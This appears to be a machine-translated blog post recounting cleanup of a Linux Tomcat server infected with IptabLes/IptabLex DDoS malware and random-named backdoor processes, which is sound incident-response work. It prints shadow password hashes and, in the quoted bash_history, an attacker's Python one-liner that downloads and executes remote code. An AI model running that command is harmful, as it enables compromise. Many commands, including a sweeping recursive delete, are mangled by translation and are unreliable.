Note IptabLes and IptabLex virus cleanup process, iptablesiptablex
Last year, a Linux server was hacked and read 5 million lines of logs (now I think it was amazing). At that time, the log files were larger than MB. Two days ago, my brother told me that the information center teacher told him that we had a server that was supposed to have been intruded and used as a stepping stone for the Intranet, and often sent attack data to other servers in the intranet. So I went to the server overnight.
This is my first time on this server. I don't know what the situation is. I only know that this server is Linux (I want to check what release version Nima is) and I ran a website on it.
After entering, Let's first look at the release version. CentOS6.5, previously used to only play Ubuntu, but there are more or less unfamiliar ones on it. Okay, I don't have to talk about it anymore.
Let's look at some web pages. Under cd/var/, the directory such as www or htdocs is not displayed. It is not tomcat. After searching, it is. The webpage content should not be viewed first. The permission has been obtained successfully. Check the server.
When I wrote the article, I realized that I should not look at other things in the beginning. I should back up. bash_history first. Just give yourself a wake-up call.
Look at passwd and shadow:
[Root @ localhost/] # stat/etc/passwd
File: "/etc/passwd"
Size: 1723 Blocks: 8 IO Block: 4096 common file
Device: fd00h/64768d Inode: 919098 Links: 1
Access: (0644/-rw-r --) Uid: (0/root) Gid: (0/root)
Access: 09:32:01. 730288306 + 0800
Modify: 09:31:28. 469644869 + 0800
Change: 09:31:28. 503201786 + 0800
[Root @ localhost/] # stat/etc/shadow
File: "/etc/shadow"
Size: 1177 Blocks: 8 IO Block: 4096 common file
Device: fd00h/64768d Inode: 919095 Links: 1
Access: (0000/----------) Uid: (0/root) Gid: (0/root)
Access: 09:40:01. 734126039 + 0800
Modify: 09:38:11. 473125883 + 0800
Change: 09:38:11. 498275087 + 0800
It seems that the intrusion was successful in April 2. View the directory under/home, with one more user. Let's take a look at passwd.
[root@localhost /]#cat /etc/shadow
mysql:!!:15791:::::: tomcat:!!:15791:::::: chu:$6$kG9zMTps$7H61NSjXMY3/Jc/tZrJtCuwFn1mhDyWXVg4blFghfLdbQNXr.6Li9tYt5fYVJsIlvwb0z68k/EQXsUljZK6.L0:15793:0:99999:7::: sqzr:$6$yBrvX/HDaim/vrK4$uArYMq6Zr2XM7BWTzexC16RI6HGmOp9cs65AgLR.v.yx3rN0M6YzblNCJytGsguFSbsGN18OPpcyrSG63fKKS.:16162:0:99999:7:::
Passwd won't be written. In passwd, sqzr is followed by root, that is, root permission. Userdel sqzr indicates that it cannot be deleted. It is currently logged on to Nima. This user just gave root an alias. Directly modify two files and delete this row. The user is cleaned up.
Check the process:
21911 ? 00:00:00 .IptabLex
21917 ? 00:00:00 .IptabLes
29093 ? 00:00:02 prwpodebiq
What is this? At first glance, I thought it was a firewall, but there was another one. Next I Thought It Was case sensitive in Linux. This was not the case.
Baidu has discovered that it is indeed a virus, and some others have recruited it.
Http://www.xujiansheng.cn/2014/01/linux-viruses-iptablex-iptables/
There is also the prwpodebiq, the process name that is completely meaningless, such a large pid, there must be a problem.
[Root @ localhost/] # find/-name prwpodebiq-print
/Boot/prwpodebiq
/Etc/rc. d/init. d/prwpodebiq
[Root @ localhost/] # cd/boot/
[Root @ localhost boot] # ll
Total usage 19858
-Rw-r --. 1 root 97862 May 20 2011 config-2.6.32-71.el6.x86_64
Drwxr-xr-x. 3 root 1024 2013 efi
Drwxr-xr-x. 2 root 1024 2013 grub
-Rw-r --. 1 root 13419499 March 27 2013 initramfs-2.6.32-71.el6.x86_64.img
Lrwxrwxrwx 1 root 25 September 16 22:31 IptabLes->/etc/rc. d/init. d/IptabLes
Lrwxrwxrwx 1 root 25 September 16 22:31 IptabLex->/etc/rc. d/init. d/IptabLex
Drwx ------. 2 root 12288 March 27 2013 lost + found
-Rwxr-x --- 1 root 613533 21:29 prwpodebiq
-Rw-r --. 1 root 160542 May 20 2011 symvers-2.6.32-71.el6.x86_64.gz
-Rw-r --. 1 root 2226490 May 20 2011 System. map-2.6.32-71.el6.x86_64
-Rwxr-xr-x. 1 root 3791040 May 20 2011 vmlinuz-2.6.32-71.el6.x86_64
[Root @ localhost boot] # stat prwpodebiq
File: "prwpodebiq"
Size: 613533 Blocks: 1200 IO Block: 1024 common file
Device: 801 h/2049d Inode: 22 Links: 1
Access: (0750/-rwxr-x ---) Uid: (0/root) Gid: (0/root)
Access: 23:16:18. 000000000 + 0800
Modify: 21:29:26. 000000000 + 0800
Change: 21:29:26. 000000000 + 0800
777 file, locate the virus.
[root@localhost boot]# find / -name *IptabL* -print
/boot/.IptabLes
/boot/.IptabLex
/etc/rc.d/rc4.d/S55IptabLes
/etc/rc.d/rc4.d/S55IptabLex
/etc/rc.d/rc2.d/S55IptabLes
/etc/rc.d/rc2.d/S55IptabLex
/etc/rc.d/rc3.d/S55IptabLes
/etc/rc.d/rc3.d/S55IptabLex
/etc/rc.d/rc5.d/S55IptabLes
/etc/rc.d/rc5.d/S55IptabLex
/usr/.IptabLes
/usr/.IptabLex
[root@localhost boot]# rm -rf `find / -name *IptabL*`
Some items are manually deleted, but there are too many items. You can use find to delete them directly.
In addition, I used lsof to see that some processes are associated with the pid files under/, So I deleted them directly.
# Ll-a/(only suspicious files are displayed)
-Rw-r -- 1 root 5 Jan 12 :15. mylisthb. pid
-Rw-r -- 1 root 5 Jan 12 10:01. mylistharvard. pid
-Rw-r -- 1 root 5 Jan 12 10:01. mylisthbSx. pid
-Rw-r -- 1 root 5 Jan 12 16:57. mylistx. pid
I feel that the problem has been solved. ps-A can see if there is any problem... So ..
3499 ? 00:00:00 sshd
3505 ? 00:00:00 kdpiaqommj
3506 pts/0 00:00:00 ps
29093 ? 00:00:10 prwpodebiq
29101 ? 00:00:00 flush-8:0
31327 ? 00:00:00 sshd
31378 pts/0 00:00:06 bash
There is another kdpiaqommj and prwpodebiq. This process has no meaning. Lsof. It is found that the system is dizzy under/boot, and then rm after kill.
Again, another tieyhxjhkl occurs.
[Root @ localhost bin] # lsof-p 5669
Command pid user fd type device size/OFF NODE NAME
Tieyhxjhk 5669 root cwd DIR 253,0 4096 1324611/usr/local/tomcat/apache-tomcat-7.0.39/bin
Tieyhxjhk 5669 root rtd DIR 253,0 4096 2/
Tieyhxjhk 5669 root txt REG 613533 18/boot/tieyhxjhkl
Tieyhxjhk 5669 root 0u CHR 1, 3, 0t0 3569/dev/null
Tieyhxjhk 5669 root 1u CHR 1, 3, 0t0 3569/dev/null
Tieyhxjhk 5669 root 2u CHR 1, 3, 0t0 3569/dev/null
Tieyhxjhk 5669 root 3u IPv4 1445967634 0t0 TCP here is my IP: 59978-> 66.102.253.30: dvr-esm (SYN_SENT)
Is it a reverse shell or something?
There should be files changed. Go to the tomcat directory and check them.
[Root @ localhost bin] # ll
Total usage 1828
-Rw-r -- 1 root 28615 March 22 2013 bootstrap. jar
-Rw-r -- 1 root 461 May 18 00:54 c: \ 2.vbs
-Rw-r -- 1 root 13217 March 22 2013 catalina. bat
-Rwxr-xr-x 1 root 19276 September March 22 2013 catalina. sh
-Rw-r -- 1 root 2121 March 22 2013 catalina-tasks.xml
-Rw-r -- 1 root 24281 March 22 2013 commons-daemon.jar
-Rw-r -- 1 root 202451 March 22 2013 commons-daemon-native.tar.gz
-Rw-r -- 1 root 2131 March 22 2013 configtest. bat
-Rwxr-xr-x 1 root 1982 February March 22 2013 configtest. sh
-Rw-r -- 1 root 1342 March 22 2013 cpappend. bat
-Rwxr-xr-x 1 root 22987 May 23 09:04 D32
-Rwxr-xr-x 1 root 27805 May 23 09:04 D64
-Rwxr-xr-x 1 root 7492 August March 22 2013 daemon. sh
-Rw-r -- 1 root 2178 March 22 2013 digest. bat
-Rwxr-xr-x 1 root 2021 March 22 2013 digest. sh
-Rw-r -- 1 root 1103207 July 11 02:49 getsetup. hb.1
-Rw-r -- 1 root 0 August 5 16:19 ******** pwd
-Rw-r -- 1 root 3264 March 22 2013 setclasspath. bat
-Rwxr-xr-x 1 root 3524 September March 22 2013 setclasspath. sh
-Rw-r -- 1 root 2111 March 22 2013 shutdown. bat
-Rwxr-xr-x 1 root 1960 March 22 2013 shutdown. sh
-Rw-r -- 1 root 2112 March 22 2013 startup. bat
-Rwxr-xr-x 1 root 1961 March 22 2013 startup. sh
-Rw-r -- 1 root 38161 March 22 2013 tomcat-juli.jar
-Rw-r -- 1 root 288166 March 22 2013 tomcat-native.tar.gz
-Rw-r -- 1 root 4114 March 22 2013 tool-wrapper.bat
-Rwxr-xr-x 1 root 5086 March 22 2013 tool-wrapper.sh
-Rw-r -- 1 root 2116 March 22 2013 version. bat
-Rwxr-xr-x 1 root 1965 2013 version. sh
The red text is not found in tomcat and is deleted.
Then kill. Then restart the server.
Then I lost my head !!!!!! This time, the cwd of lsof is. There is nothing at the root.
Then I found that the process generates a random name, and then two sub-processes are generated. The sub-process is also a random name, and only has less than 2 seconds to survive. Kill the parent process. At the same time, it will generate its own executable files under/boot.
Through netstat-anput, we can find that the function of this process is TCP. Here is my IP: 59978-> 66.102.253.30: dvr-esm (SYN_SENT ).
Tcp 0 1 here is my IP: 41939 222.34.129.154: 2804 SYN_SENT 1701/bash
This Nima seems to be a reverse shell.
Let's take a look at. bash_history.
973 find -name '*tomcat*'
974 find -name 'index.jsp'
975 ------------------------------
976 find -name 'index.jsp'
977 ls
978 top
979 ls
980 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
981 python2
982 python
983 ls
984 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
985 wget www.baidu.com
986 cat index.html
987 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
988 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2 --no-check-certificate
989 ls
990 tar -jxvf Python-2.7.tar.bz2
991 cd p
992 cd Python-2.7/
993 dir
994 ./configure
995 make
996 make install
997 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
998 python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
999 pip
1000 yum install python-zlib
He installed python first, and then went to the URL to get a script. The website looked at it and it was a hack website. That's the privilege escalation and webshell. If you want to see what else, you can only save 1000 rows !!!!!
Tail-100/var/log/secure
Look at the security information, there is a public IP desperately trying to root the password, and it is through ssh. Of course, it is acceptable to disable ssh. I still need to use ssh on the public network, so I can only block this public IP on hosts. deny.
The Network Center of Northeastern University has a common IP address for ssh attacks and a sh script:
Web: http://antivirus.neu.edu.cn/scan/ssh.php
It blocks other users' ssh connections, but the internal process is still running.
TCP here is my IP: 59978-> 66.102.253.30: dvr-esm (SYN_SENT)
He should use the Struts2 vulnerability to access the server, but the backdoor left by him cannot be solved yet,
The Struts2 vulnerability can be viewed here:
Http://struts.apache.org/release/2.3.x/docs/s2-016.html
So far, come here first. Let's take a look.
The iptables of the LINUX Process is faulty. The network resources are basically fully occupied and cannot be pinged.
Brother, you are poisoned. linux. ddos process file name. IptabLes. IptabLex IptabLes IptabLex
Pkill-9. IptabLes
Pkill-9. IptabLex
Pkill-9 IptabLes
Pkill-9 IptabLex
Find/-name. IptabLe *
Then delete
This forwards the process to the virtual machine and then runs the file.
Trace the strace-p process number to find the communication IP address.
Estimated website Vulnerabilities